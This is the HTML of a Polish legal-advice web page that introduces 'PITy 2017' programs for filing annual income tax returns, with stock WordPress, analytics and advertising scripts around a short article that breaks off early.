<!DOCTYPE html><html lang="pl-PL" prefix="og: http://ogp.me/ns#"><head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, minimum-scale=1,  maximum-scale=1">    
<meta name="keywords" content="Słowa kluczowe">        
<meta name="author" content="Blizejprawa.pl">        
<link rel="pingback" href="https://www.blizejprawa.pl/xmlrpc.php">         
<!-- <link href="https://www.blizejprawa.pl/wp-content/themes/hefe/style.css" rel="stylesheet" media="screen"> -->
<link rel="stylesheet" type="text/css" href="//www.blizejprawa.pl/wp-content/cache/wpfc-minified/9l6g3g59/6fd53.css" media="screen"> 
<link rel="shortcut icon" href="https://www.blizejprawa.pl/wp-content/uploads/2015/04/favicon-1.png">	
<link rel="apple-touch-icon" href="https://www.blizejprawa.pl/wp-content/uploads/2015/04/favicon-1.png">
<!-- This site is optimized with the Yoast SEO plugin v9.1 - https://yoast.com/wordpress/plugins/seo/ -->
<title>Rozliczenie rocznego podatku dochodowego przy pomocy PITy 2017 program - BlizejPrawa.pl</title>
<link rel="canonical" href="https://www.blizejprawa.pl/prawo-podatkowe/rozliczenie-rocznego-podatku-dochodowego-przy-pomocy-pity-2017-program/">
<meta property="og:locale" content="pl_PL">
<meta property="og:type" content="article">
<meta property="og:title" content="Rozliczenie rocznego podatku dochodowego przy pomocy PITy 2017 program - BlizejPrawa.pl">
<meta property="og:description" content="Pod pojęciem PITy 2017 program kryje się cała gama aplikacji i oprogramowania do rozliczania rocznych zeznań podatkowych. Programy tego typu …">
<meta property="og:url" content="https://www.blizejprawa.pl/prawo-podatkowe/rozliczenie-rocznego-podatku-dochodowego-przy-pomocy-pity-2017-program/">
<meta property="og:site_name" content="Blizejprawa.pl">
<meta property="article:tag" content="pit">
<meta property="article:tag" content="pity">
<meta property="article:tag" content="podatek">
<meta property="article:section" content="Prawo podatkowe">
<meta property="article:published_time" content="2017-02-24T07:17:37+00:00">
<meta property="og:image" content="https://www.blizejprawa.pl/wp-content/uploads/2017/02/4.jpg">
<meta property="og:image:secure_url" content="https://www.blizejprawa.pl/wp-content/uploads/2017/02/4.jpg">
<meta property="og:image:width" content="1200">
<meta property="og:image:height" content="900">
<meta property="og:image:alt" content="Program do PITów">
<meta name="twitter:card" content="summary">
<meta name="twitter:description" content="Pod pojęciem PITy 2017 program kryje się cała gama aplikacji i oprogramowania do rozliczania rocznych zeznań podatkowych. Programy tego typu […]">
<meta name="twitter:title" content="Rozliczenie rocznego podatku dochodowego przy pomocy PITy 2017 program - BlizejPrawa.pl">
<meta name="twitter:image" content="https://www.blizejprawa.pl/wp-content/uploads/2017/02/4.jpg">
<!-- / Yoast SEO plugin. -->
<link rel="dns-prefetch" href="//s.w.org">
<script src="https://www.googletagservices.com/activeview/js/current/osd.js?cb=%2Fr20100101"></script><script src="https://pagead2.googlesyndication.com/pub-config/r20160913/ca-pub-1720506481217592.js"></script><script async="" src="//www.google-analytics.com/analytics.js"></script><script type="text/javascript">
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.4\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.4\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.blizejprawa.pl\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.6"}};
!function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56692,8205,9792,65039],[55357,56692,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings);
</script><script src="https://www.blizejprawa.pl/wp-includes/js/wp-emoji-release.min.js?ver=4.9.6" type="text/javascript" defer=""></script>
<style type="text/css">
img.wp-smiley,
img.emoji {
display: inline !important;
border: none !important;
box-shadow: none !important;
height: 1em !important;
width: 1em !important;
margin: 0 .07em !important;
vertical-align: -0.1em !important;
background: none !important;
padding: 0 !important;
}
</style>
<!-- <link rel='stylesheet' id='contact-form-7-css'  href='https://www.blizejprawa.pl/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.0.5' type='text/css' media='all' /> -->
<!-- <link rel='stylesheet' id='gglcptch-css'  href='https://www.blizejprawa.pl/wp-content/plugins/google-captcha/css/gglcptch.css?ver=1.37' type='text/css' media='all' /> -->
<!-- <link rel='stylesheet' id='wpgdprc.css-css'  href='https://www.blizejprawa.pl/wp-content/plugins/wp-gdpr-compliance/assets/css/front.css?ver=1541745414' type='text/css' media='all' /> -->
<link rel="stylesheet" type="text/css" href="//www.blizejprawa.pl/wp-content/cache/wpfc-minified/70e5qkir/6fd53.css" media="all">
<style id="wpgdprc.css-inline-css" type="text/css">
div.wpgdprc .wpgdprc-switch .wpgdprc-switch-inner:before { content: 'Tak'; }
div.wpgdprc .wpgdprc-switch .wpgdprc-switch-inner:after { content: 'Nie'; }
</style>
<script src="//www.blizejprawa.pl/wp-content/cache/wpfc-minified/1cr692h/6fd53.js" type="text/javascript"></script>
<!-- <script type='text/javascript' src='https://www.blizejprawa.pl/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> -->
<!-- <script type='text/javascript' src='https://www.blizejprawa.pl/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> -->
<!-- <script type='text/javascript' src='https://www.blizejprawa.pl/wp-content/plugins/wp-gdpr-compliance/assets/vendor/micromodal/micromodal.min.js?ver=1541745414'></script> -->
<link rel="https://api.w.org/" href="https://www.blizejprawa.pl/wp-json/">
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.blizejprawa.pl/xmlrpc.php?rsd">
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.blizejprawa.pl/wp-includes/wlwmanifest.xml"> 
<meta name="generator" content="WordPress 4.9.6">
<link rel="shortlink" href="https://www.blizejprawa.pl/?p=2157">
<link rel="alternate" type="application/json+oembed" href="https://www.blizejprawa.pl/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.blizejprawa.pl%2Fprawo-podatkowe%2Frozliczenie-rocznego-podatku-dochodowego-przy-pomocy-pity-2017-program%2F">
<link rel="alternate" type="text/xml+oembed" href="https://www.blizejprawa.pl/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.blizejprawa.pl%2Fprawo-podatkowe%2Frozliczenie-rocznego-podatku-dochodowego-przy-pomocy-pity-2017-program%2F&amp;format=xml">
<style>
.reveal-modal{
padding-top:px !important;
padding-bottom:px !important;
padding-left:px !important;
padding-right:px !important;
}
</style>
<!-- Markup (JSON-LD) structured in schema.org ver.4.6.1 START -->
<script type="application/ld+json">
{
"@context": "http://schema.org",
"@type": "BreadcrumbList",
"itemListElement": [
{
"@type": "ListItem",
"position": 1,
"item": {
"@id": "https://www.blizejprawa.pl",
"name": "BlizejPrawa.pl"
}
},
{
"@type": "ListItem",
"position": 2,
"item": {
"@id": "https://www.blizejprawa.pl/artykuly/abecadlo/",
"name": "Abecadło"
}
},
{
"@type": "ListItem",
"position": 3,
"item": {
"@id": "https://www.blizejprawa.pl/prawo-podatkowe/rozliczenie-rocznego-podatku-dochodowego-przy-pomocy-pity-2017-program/",
"name": "Rozliczenie rocznego podatku dochodowego przy pomocy PITy 2017 program"
}
}
]
}
</script>
<script type="application/ld+json">
{
"@context": "http://schema.org",
"@type": "Article",
"mainEntityOfPage": {
"@type": "WebPage",
"@id": "https://www.blizejprawa.pl/prawo-podatkowe/rozliczenie-rocznego-podatku-dochodowego-przy-pomocy-pity-2017-program/"
},
"headline": "Rozliczenie rocznego podatku dochodowego przy pomocy PITy 2017 program",
"datePublished": "2017-02-24T08:17:37+0000",
"dateModified": "2017-02-24T08:17:37+0000",
"author": {
"@type": "Person",
"name": "admin"
},
"description": "Pod pojęciem PITy 2017 program kryje się cała gama aplikacji i oprogramowania do rozliczania rocznych zeznań p",
"image": {
"@type": "ImageObject",
"url": "https://www.blizejprawa.pl/wp-content/uploads/2017/02/4.jpg",
"width": 1200,
"height": 900
},
"publisher": {
"@type": "Organization",
"name": "Blizejprawa.pl",
"logo": {
"@type": "ImageObject",
"url": "https://www.blizejprawa.pl/wp-content/uploads/2016/10/paragraf.png",
"width": 0,
"height": 0
}
}
}
</script>
<!-- Markup (JSON-LD) structured in schema.org END -->
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','//www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-57271920-21', 'auto');
ga('send', 'pageview');
</script>
<script async="" src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<script>
(adsbygoogle = window.adsbygoogle || []).push({
google_ad_client: "ca-pub-1720506481217592",
enable_page_level_ads: true
});
</script>
<link rel="preload" href="https://adservice.google.com.ph/adsid/integrator.js?domain=www.blizejprawa.pl"><script type="text/javascript" src="https://adservice.google.com.ph/adsid/integrator.js?domain=www.blizejprawa.pl"></script><link rel="preload" href="https://adservice.google.com/adsid/integrator.js?domain=www.blizejprawa.pl"><script type="text/javascript" src="https://adservice.google.com/adsid/integrator.js?domain=www.blizejprawa.pl"></script><link rel="preload" href="https://pagead2.googlesyndication.com/pagead/js/r20190320/r20190131/show_ads_impl.js"></head>
<body class="default" style=""> 
<!-- Preloader -->
<!-- <div id="preloader">
<div class="bubblingG">
<span id="bubblingG_1">
</span>
<span id="bubblingG_2">
</span>
<span id="bubblingG_3">
</span>
</div>
</div> -->
<!-- End Preloader -->
<!-- Header -->
<header id="main-header">
<!-- mobile click button to show menu -->
<button id="mobile-button">
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<!-- Top menu -->
<div id="top-menu">
<div class="container">
<nav>
<ul id="menu-top" class="menu"><li id="menu-item-2113" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-2113"><a href="https://www.blizejprawa.pl/artykuly/abecadlo/">Abecadło</a></li>
<li id="menu-item-32" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-32"><a href="https://www.blizejprawa.pl/polityka-prywatnosci/">Polityka prywatności</a></li>
<li id="menu-item-1689" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1689"><a href="https://www.blizejprawa.pl/wspolpraca/">Współpraca</a></li>
<li id="menu-item-34" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-34"><a href="https://www.blizejprawa.pl/kontakt/">Kontakt</a></li>
</ul> 
</nav>
</div>
</div>
<!-- End Top menu -->
<!-- Interesting articles -->
<div id="interesting-articles">
<div class="container">
<h2>Ciekawe artykuły <span class="arrow"></span></h2><ul id="interesting-articles-list" style="width: 55px; opacity: 0; display: block;" class="owl-carousel owl-theme">           
<div class="owl-wrapper-outer"><div class="owl-wrapper" style="width: 32px; left: 0px; display: block;"><div class="owl-item" style="width: 4px;"><li><a href="https://www.blizejprawa.pl/porady-prawne/kiedy-swiadomie-okradamy-wlasne-dzieci/" title="Kiedy świadomie okradamy własne dzieci…">
Kiedy świadomie okradamy własne ...</a></li></div><div class="owl-item" style="width: 4px;"><li><a href="https://www.blizejprawa.pl/dokumenty/umowa-darowizny-samochodu/" title="Umowa darowizny samochodu">
Umowa darowizny samochodu</a></li></div><div class="owl-item" style="width: 4px;"><li><a href="https://www.blizejprawa.pl/dokumenty/wypowiedzenie-umowy-zlecenie-przez-zleceniobiorce/" title="Wypowiedzenie umowy zlecenie przez zleceniobiorcę">
Wypowiedzenie umowy zlecenie ...</a></li></div><div class="owl-item" style="width: 4px;"><li><a href="https://www.blizejprawa.pl/dokumenty/wypowiedzenie-umowy-o-prace-przez-pracownika/" title="Wypowiedzenie umowy o pracę przez pracownika">
Wypowiedzenie umowy o pracę ...</a></li></div></div></div>



</ul>
</div>
</div>
<!-- End Interresting articles-->
<div class="container">
<!-- website title / logo image -->
<p id="main-logo">
<a href="https://www.blizejprawa.pl/">
<img src="https://www.blizejprawa.pl/wp-content/uploads/2016/03/paragraf.png" alt="Porady prawne online - Blizejprawa.pl">
</a>
</p>
<!-- Main navigation menu -->          
<nav class="main">
<ul id="mainmenu">   
<li><a href="https://www.blizejprawa.pl/blog/"><i class="fa fa-book"></i> Blog prawnika</a>
<div class="dropdown-container">
<div class="dropdown">
<div class="row">
<div class="col-sm-5">    
<div class="item">
<a href="https://www.blizejprawa.pl/artykuly/wypowiedzenia-umow/" title="Wypowiedzenia umów" class="category-link" id="ry-1">
Wypowiedzenia umów                                </a>
</div>
<div class="item">
<a href="https://www.blizejprawa.pl/artykuly/prawo-spolek/" title="Prawo spółek" class="category-link" id="ry-2">
Prawo spółek                                </a>
</div>
<div class="item">
<a href="https://www.blizejprawa.pl/artykuly/prawo-spadkowe/" title="Prawo spadkowe" class="category-link" id="ry-3">
Prawo spadkowe                                </a>
</div>
<div class="item">
<a href="https://www.blizejprawa.pl/artykuly/prawo-rodzinne/" title="Prawo rodzinne" class="category-link" id="ry-4">
Prawo rodzinne                                </a>
</div>
<div class="item">
<a href="https://www.blizejprawa.pl/artykuly/prawo-pracy/" title="Prawo pracy" class="category-link" id="ry-5">
Prawo pracy                                </a>
</div>
</div>
<div class="col-sm-7 category-post-list" id="category-1" style="display: block;">
<div class="post">
<a href="https://www.blizejprawa.pl/wypowiedzenia-umow/wypowiedzenie-umowy-w-sieci-komorkowej/" class="menu-thumb"><img src="https://www.blizejprawa.pl/wp-content/uploads/2015/10/telefon-1-150x150.jpg" alt="Wypowiedzenie umowy w sieci komórkowej"></a>
<p class="title"><a href="https://www.blizejprawa.pl/wypowiedzenia-umow/wypowiedzenie-umowy-w-sieci-komorkowej/">Wypowiedzenie umowy w sieci komórkowej</a></p>
<p class="date">9 listopada 2015</p>
</div>
<div class="post">
<a href="https://www.blizejprawa.pl/wypowiedzenia-umow/wypowiedzenie-umowy-upc/" class="menu-thumb"><img src="https://www.blizejprawa.pl/wp-content/uploads/2015/10/ksiazkabiznesowa-1-150x150.jpg" alt="Wypowiedzenie umowy UPC, czyli rezygnacja z UPC"></a>
<p class="title"><a href="https://www.blizejprawa.pl/wypowiedzenia-umow/wypowiedzenie-umowy-upc/">Wypowiedzenie umowy UPC, czyli rezygnacja z UPC</a></p>
<p class="date">9 listopada 2015</p>
</div>
<div class="post">
<a href="https://www.blizejprawa.pl/porady-prawne/wypowiedzenie-umowy-rachunku-bankowego/" class="menu-thumb"><img src="https://www.blizejprawa.pl/wp-content/uploads/2015/09/1648245-pieniadze-podatki-657-323-1-150x150.jpg" alt="Wypowiedzenie umowy rachunku bankowego"></a>
<p class="title"><a href="https://www.blizejprawa.pl/porady-prawne/wypowiedzenie-umowy-rachunku-bankowego/">Wypowiedzenie umowy rachunku bankowego</a></p>
<p class="date">9 listopada 2015</p>
</div>
<div class="post">
<a href="https://www.blizejprawa.pl/porady-prawne/wypowiedzenie-umowy-kredytu/" class="menu-thumb"><img src="https://www.blizejprawa.pl/wp-content/uploads/2015/09/money-dollars-6-1-150x150.jpg" alt="Wypowiedzenie umowy kredytu"></a>
<p class="title"><a href="https://www.blizejprawa.pl/porady-prawne/wypowiedzenie-umowy-kredytu/">Wypowiedzenie umowy kredytu</a></p>
<p class="date">9 listopada 2015</p>
</div>
<p class="see-all">
<a href="https://www.blizejprawa.pl/artykuly/wypowiedzenia-umow/"><i class="fa fa-file-text-o"></i> <span>zobacz wszystkie</span></a>
</p> 
</div>
<div class="col-sm-7 category-post-list" id="category-2" style="display: none;">
<div class="post">
<a href="https://www.blizejprawa.pl/prawo-spolek/wady-i-zalety-spolki-z-o-o/" class="menu-thumb"><img src="https://www.blizejprawa.pl/wp-content/uploads/2017/02/wadyizalety-1-1-150x150.jpg" alt="Wady i zalety spółki z o.o."></a>
<p class="title"><a href="https://www.blizejprawa.pl/prawo-spolek/wady-i-zalety-spolki-z-o-o/">Wady i zalety spółki z o.o.</a></p>
<p class="date">13 lutego 2017</p>
</div>
<div class="post">
<a href="https://www.blizejprawa.pl/porady-prawne/jak-zalozyc-spolke/" class="menu-thumb"><img src="https://www.blizejprawa.pl/wp-content/uploads/2016/05/fajne-zdjecie-150x150.jpg" alt="Jak założyć spółkę?"></a>
<p class="title"><a href="https://www.blizejprawa.pl/porady-prawne/jak-zalozyc-spolke/">Jak założyć spółkę?</a></p>
<p class="date">2 maja 2016</p>
</div>
<div class="post">
<a href="https://www.blizejprawa.pl/prawo-spolek/spolka-ograniczona-odpowiedzialnoscia-proces-rejestracji-spolki/" class="menu-thumb"><img src="https://www.blizejprawa.pl/wp-content/uploads/2016/05/fajne-zdjecie-150x150.jpg" alt="Spółka z ograniczoną odpowiedzialnością – proces rejestracji spółki"></a>
<p class="title"><a href="https://www.blizejprawa.pl/prawo-spolek/spolka-ograniczona-odpowiedzialnoscia-proces-rejestracji-spolki/">Spółka z ograniczoną odpowiedzialnością – proces rejestracji spółki</a></p>
<p class="date">16 lutego 2017</p>
</div>
<div class="post">
<a href="https://www.blizejprawa.pl/prawo-spolek/co-to-jest-emisja-z-prawem-poboru/" class="menu-thumb"><img src="https://www.blizejprawa.pl/wp-content/uploads/2016/04/keyboard-824317_1280-150x150.jpg" alt="Co to jest emisja z prawem poboru?"></a>
<p class="title"><a href="https://www.blizejprawa.pl/prawo-spolek/co-to-jest-emisja-z-prawem-poboru/">Co to jest emisja z prawem poboru?</a></p>
<p class="date">25 stycznia 2017</p>
</div>
<p class="see-all">
<a href="https://www.blizejprawa.pl/artykuly/prawo-spolek/"><i class="fa fa-file-text-o"></i> <span>zobacz wszystkie</span></a>
</p> 
</div>
<div class="col-sm-7 category-post-list" id="category-3" style="display: none;">
<div class="post">
<a href="https://www.blizejprawa.pl/prawo-spadkowe/stwierdzenie-nabycia-spadku-jakie-dokumenty-sa-konieczne/" class="menu-thumb"><img src="https://www.blizejprawa.pl/wp-content/uploads/2017/10/swierdzenie-150x150.jpg" alt="Stwierdzenie nabycia spadku – jakie dokumenty są konieczne?"></a>
<p class="title"><a href="https://www.blizejprawa.pl/prawo-spadkowe/stwierdzenie-nabycia-spadku-jakie-dokumenty-sa-konieczne/">Stwierdzenie nabycia spadku – jakie dokumenty są konieczne?</a></p>
<p class="date">25 października 2017</p>
</div>
<div class="post">
<a href="https://www.blizejprawa.pl/prawo-spadkowe/kiedy-ubiegac-sie-o-spadek-po-rodzicach/" class="menu-thumb"><img src="https://www.blizejprawa.pl/wp-content/uploads/2017/10/wp-ofe-spadekrodz-150x150.jpg" alt="Kiedy ubiegać się o spadek po rodzicach?"></a>
<p class="title"><a href="https://www.blizejprawa.pl/prawo-spadkowe/kiedy-ubiegac-sie-o-spadek-po-rodzicach/">Kiedy ubiegać się o spadek po rodzicach?</a></p>
<p class="date">19 października 2017</p>
</div>
<div class="post">
<a href="https://www.blizejprawa.pl/prawo-spadkowe/prawo-spadkowe-a-testament/" class="menu-thumb"><img src="https://www.blizejprawa.pl/wp-content/uploads/2017/07/prawo-spadkowe-wroclaw-150x150.jpg" alt="Prawo spadkowe, a testament"></a>
<p class="title"><a href="https://www.blizejprawa.pl/prawo-spadkowe/prawo-spadkowe-a-testament/">Prawo spadkowe, a testament</a></p>
<p class="date">3 lipca 2017</p>
</div>
<div class="post">
<a href="https://www.blizejprawa.pl/prawo-spadkowe/spadek-co-warto-wiedziec/" class="menu-thumb"><img src="https://www.blizejprawa.pl/wp-content/uploads/2017/03/brothers-2107264_960_720-150x150.jpg" alt="Spadek – co warto wiedzieć"></a>
<p class="title"><a href="https://www.blizejprawa.pl/prawo-spadkowe/spadek-co-warto-wiedziec/">Spadek – co warto wiedzieć</a></p>
<p class="date">16 marca 2017</p>
</div>
<p class="see-all">
<a href="https://www.blizejprawa.pl/artykuly/prawo-spadkowe/"><i class="fa fa-file-text-o"></i> <span>zobacz wszystkie</span></a>
</p> 
</div>
<div class="col-sm-7 category-post-list" id="category-4" style="display: none;">
<div class="post">
<a href="https://www.blizejprawa.pl/prawo-rodzinne/rozdzielnosc-majatkowa-kiedy-warto-ja-wdrozyc/" class="menu-thumb"><img src="https://www.blizejprawa.pl/wp-content/uploads/2019/02/bills-capital-cash-210679-150x150.jpg" alt="Rozdzielność majątkowa. Kiedy warto ją wdrożyć?"></a>
<p class="title"><a href="https://www.blizejprawa.pl/prawo-rodzinne/rozdzielnosc-majatkowa-kiedy-warto-ja-wdrozyc/">Rozdzielność majątkowa. Kiedy warto ją wdrożyć?</a></p>
<p class="date">13 lutego 2019</p>
</div>
<div class="post">
<a href="https://www.blizejprawa.pl/prawo-rodzinne/sprawa-rozwodowa-a-pomoc-adwokata/" class="menu-thumb"><img src="https://www.blizejprawa.pl/wp-content/uploads/2019/01/roz-150x150.jpg" alt="Sprawa rozwodowa a pomoc adwokata"></a>
<p class="title"><a href="https://www.blizejprawa.pl/prawo-rodzinne/sprawa-rozwodowa-a-pomoc-adwokata/">Sprawa rozwodowa a pomoc adwokata</a></p>
<p class="date">9 stycznia 2019</p>
</div>
<div class="post">
<a href="https://www.blizejprawa.pl/prawo-rodzinne/jak-zlozyc-pozew-o-rozwod/" class="menu-thumb"><img src="https://www.blizejprawa.pl/wp-content/uploads/2018/12/proces-rozwodowy-150x150.jpg" alt="Jak złożyć pozew o rozwód?"></a>
<p class="title"><a href="https://www.blizejprawa.pl/prawo-rodzinne/jak-zlozyc-pozew-o-rozwod/">Jak złożyć pozew o rozwód?</a></p>
<p class="date">15 grudnia 2018</p>
</div>
<div class="post">
<a href="https://www.blizejprawa.pl/abecadlo/jakie-koszty-wchodza-w-zakres-utrzymania-dziecka-przy-wyliczeniu-alimentow/" class="menu-thumb"><img src="https://www.blizejprawa.pl/wp-content/uploads/2018/09/ed61e286b581e24b05e002354a9e577c-150x150.jpg" alt="Jakie koszty wchodzą w zakres utrzymania dziecka przy wyliczeniu alimentów?"></a>
<p class="title"><a href="https://www.blizejprawa.pl/abecadlo/jakie-koszty-wchodza-w-zakres-utrzymania-dziecka-przy-wyliczeniu-alimentow/">Jakie koszty wchodzą w zakres utrzymania dziecka przy wyliczeniu alimentów?</a></p>
<p class="date">11 września 2018</p>
</div>
<p class="see-all">
<a href="https://www.blizejprawa.pl/artykuly/prawo-rodzinne/"><i class="fa fa-file-text-o"></i> <span>zobacz wszystkie</span></a>
</p> 
</div>
<div class="col-sm-7 category-post-list" id="category-5" style="display: none;">
<div class="post">
<a href="https://www.blizejprawa.pl/prawo-pracy/poradnik-dla-pracodawcy-umowa-o-prace/" class="menu-thumb"><img src="https://www.blizejprawa.pl/wp-content/uploads/2018/11/154151778737386300-150x150.jpg" alt="Poradnik dla pracodawcy: umowa o pracę"></a>
<p class="title"><a href="https://www.blizejprawa.pl/prawo-pracy/poradnik-dla-pracodawcy-umowa-o-prace/">Poradnik dla pracodawcy: umowa o pracę</a></p>
<p class="date">8 listopada 2018</p>
</div>
<div class="post">
<a href="https://www.blizejprawa.pl/prawo-pracy/wynagrodzenie-minimalne-za-2013-rok-warto-o-nim-wiedziec/" class="menu-thumb"><img src="https://www.blizejprawa.pl/wp-content/uploads/2016/04/question-1316632_1280-150x150.png" alt="Wynagrodzenie minimalne za 2013 rok – warto o nim wiedzieć"></a>
<p class="title"><a href="https://www.blizejprawa.pl/prawo-pracy/wynagrodzenie-minimalne-za-2013-rok-warto-o-nim-wiedziec/">Wynagrodzenie minimalne za 2013 rok – warto o nim wiedzieć</a></p>
<p class="date">26 września 2013</p>
</div>
<div class="post">
<a href="https://www.blizejprawa.pl/porady-prawne/zjawisko-mobbingu-w-miejscu-pracy/" class="menu-thumb"><img src="https://www.blizejprawa.pl/wp-content/uploads/2016/03/prawnicy2-150x150.jpg" alt="Zjawisko mobbingu w miejscu pracy"></a>
<p class="title"><a href="https://www.blizejprawa.pl/porady-prawne/zjawisko-mobbingu-w-miejscu-pracy/">Zjawisko mobbingu w miejscu pracy</a></p>
<p class="date">23 marca 2016</p>
</div>
<div class="post">
<a href="https://www.blizejprawa.pl/prawo-pracy/urlop-na-zadanie-czy-mozna-go-otrzymac-w-kazdej-chwili/" class="menu-thumb"><img src="https://www.blizejprawa.pl/wp-content/uploads/2016/02/control-427512_960_720-1-150x150.png" alt="Urlop na żądanie – czy można go otrzymać w każdej chwili?"></a>
<p class="title"><a href="https://www.blizejprawa.pl/prawo-pracy/urlop-na-zadanie-czy-mozna-go-otrzymac-w-kazdej-chwili/">Urlop na żądanie – czy można go otrzymać w każdej chwili?</a></p>
<p class="date">4 października 2016</p>
</div>
<p class="see-all">
<a href="https://www.blizejprawa.pl/artykuly/prawo-pracy/"><i class="fa fa-file-text-o"></i> <span>zobacz wszystkie</span></a>
</p> 
</div>
</div>
</div>
</div>
</li>
<li><a href="https://www.blizejprawa.pl/artykuly/porady-prawne/"><i class=""></i> Poradnik prawny</a>
</li>
<li><a href="https://www.blizejprawa.pl/artykuly/dokumenty/"><i class=""></i> Dokumenty</a>
</li>
<li><a href="https://www.blizejprawa.pl/zgloszenie-prosby-o-porade/"><i class=""></i> ZADAJ PYTANIE</a>
</li>
</ul>
</nav>
<!-- End Main navigation menu -->
</div>
</header>
<div class="container"><p><script async="" src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- blizej_pod_menu -->
<ins class="adsbygoogle" style="display: block; height: 90px;" data-ad-client="ca-pub-1720506481217592" data-ad-slot="4423998669" data-ad-format="link" data-adsbygoogle-status="done"><ins id="aswift_1_expand" style="display:inline-table;border:none;height:90px;margin:0;padding:0;position:relative;visibility:visible;width:1004px;background-color:transparent;"><ins id="aswift_1_anchor" style="display:block;border:none;height:90px;margin:0;padding:0;position:relative;visibility:visible;width:1004px;background-color:transparent;"><iframe width="1004" height="90" frameborder="0" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no" allowfullscreen="true" onload="var i=this.id,s=window.google_iframe_oncopy,H=s&amp;&amp;s.handlers,h=H&amp;&amp;H[i],w=this.contentWindow,d;try{d=w.document}catch(e){}if(h&amp;&amp;d&amp;&amp;(!d.body||!d.body.firstChild)){if(h.call){setTimeout(h,0)}else if(h.match){try{h=s.upd(h,i)}catch(e){}w.location.replace(h)}}" id="aswift_1" name="aswift_1" style="left:0;position:absolute;top:0;border:0px;width:1004px;height:90px;"></iframe></ins></ins></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></p></div>
<!-- End Header -->
<div class="container">
<div id="content">
<div class="row blog-categories">
<div class="col-lg-9">
<article id="single">
<h1><span class="entry-title">Rozliczenie rocznego podatku dochodowego przy pomocy PITy 2017 program</span></h1>
<div style="text-alignt: center">
</div>
<img src="https://www.blizejprawa.pl/wp-content/uploads/2017/02/4-1024x768.jpg" alt="Rozliczenie rocznego podatku dochodowego przy pomocy PITy 2017 program" class="thumb">
<div class="post-content">
<p><br>
Pod pojęciem PITy 2017 program kryje się cała gama aplikacji i oprogramowania do rozliczania rocznych zeznań podatkowych. Programy tego typu dostępne są do bezpłatnego pobrania na Portalu Podatkowym prowadzonym przez Ministerstwo Finansów (aplikacja e-Deklaracje), na stronach internetowych niezależnych producentów, bądź jako moduły współpracujące z oprogramowaniem do prowadzenia księgowości w firmach.</p>
<p style="text-align: justify;">Chociaż pochodzą z różnych źródeł, wszystkie programy PITy 2017 mają jedną cechę wspólną: ich projektanci starają się maksymalnie ułatwić proces przygotowywania i wysłania deklaracji PIT.</p>
<p style="text-align: justify;">Czy do korzystania z <a href="https://www.pitax.pl/program-pit/">PITy 2017 program</a> potrzebna jest wiedza podatkowa i ponadprzeciętne umiejętności posługiwania się komputerem?</p>
<p style="text-align: justify;">Programy i aplikacje do rozliczania PIT tworzone są z myślą o ułatwieniu pracy czytnikowi, ale nie wszystkie przeznaczone są dla osób o małym doświadczeniu księgowym, lub podatkowym.</p>
